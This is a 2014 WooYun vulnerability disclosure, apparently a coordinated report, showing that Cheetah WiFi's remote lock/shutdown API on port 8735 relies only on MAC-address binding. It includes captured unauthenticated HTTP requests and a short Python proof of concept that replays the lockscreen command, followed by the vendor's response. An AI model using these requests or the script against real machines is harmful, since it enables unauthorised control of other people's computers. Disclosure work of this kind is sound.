当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087069

漏洞标题:猎豹wifi下非认证远程控制电脑关机、锁屏

相关厂商:金山网络

漏洞作者: 路人甲

提交时间:2014-12-14 00:06

修复时间:2015-03-14 00:08

公开时间:2015-03-14 00:08

漏洞类型:非授权访问/权限绕过

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-14: 细节已通知厂商并且等待厂商处理中
2014-12-15: 厂商已经确认,细节仅向厂商公开
2014-12-18: 细节向第三方安全合作伙伴开放
2015-02-08: 细节向核心白帽子及相关领域专家公开
2015-02-18: 细节向普通白帽子公开
2015-02-28: 细节向实习白帽子公开
2015-03-14: 细节向公众公开

简要描述:

在电脑开启猎豹WiFi热点,有一项功能是远程控制电脑关机和锁屏,发现认证仅通过mac地址绑定,可通过伪造mac地址绕过认证

详细说明:

1418485757111276.jpg


wireshark抓包如下:

POST /api/calltool?type=unlockscreen HTTP/1.1 
Host: hi.liebao.cn:8735
Connection: keep-alive
Content-Length: 0
Origin: http://hi.liebao.cn:8735
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/11D257 UCBrowser/10.1.0.518 Mobile
Accept: application/json
Accept-Language: zh-cn
Referer: http://hi.liebao.cn:8735/tool/
Accept-Encoding: gzip,deflate
HTTP/1.1 200 OK
Transfer-Encoding: chunked
C
{"code":"1"}
0
POST /api/calltool?type=lockscreen HTTP/1.1
Host: hi.liebao.cn:8735
Connection: keep-alive
Content-Length: 0
Origin: http://hi.liebao.cn:8735
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/11D257 UCBrowser/10.1.0.518 Mobile
Accept: application/json
Accept-Language: zh-cn
Referer: http://hi.liebao.cn:8735/tool/
Accept-Encoding: gzip,deflate
HTTP/1.1 200 OK
Transfer-Encoding: chunked
C
{"code":"1"}
0


可见没有加密,也没有认证。
但是设备首次利用该命令时会绑定手机的mac地址
通过嗅探合法绑定的手机发送的命令包和mac地址,然后攻击机伪造一样的mac地址和命令包,就可以绕过认证,控制电脑。但是前提是,已经接入了WiFi。

漏洞证明:

1418485757111276.jpg


import socket,sys
port =8735
#host="192.168.191.129" #223.6.252.25
host="192.168.191.1"
filename="POST /api/calltool?type=lockscreen HTTP/1.1\r\nHost: hi.liebao.cn:8735\r\nConnection: keep-alive\r\nContent-Length: 0\r\nOrigin: http://hi.liebao.cn:8735\r\nX-Requested-With: XMLHttpRequest\r\nUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/11D257 UCBrowser/10.1.0.518 Mobile\r\nAccept: application/json\r\nAccept-Language: zh-cn\r\nReferer: http://hi.liebao.cn:8735/tool/\r\nAccept-Encoding: gzip,deflate\r\n\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
s.sendall(filename)
while 1:
buf=s.recv(2048)
if not len(buf):
break
sys.stdout.write(buf)

修复方案:

通过SSL加密,关机和关闭屏幕命令

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-12-15 10:35

厂商回复:

收到,我们将尽快跟进

最新状态:

2014-12-15:该问题为已知问题,想利用该功能首先必须拿到wifi密码接入此wifi。对用户危害较小。后续猎豹WiFi将加入单独权限设置,方便关闭,请关注版本升级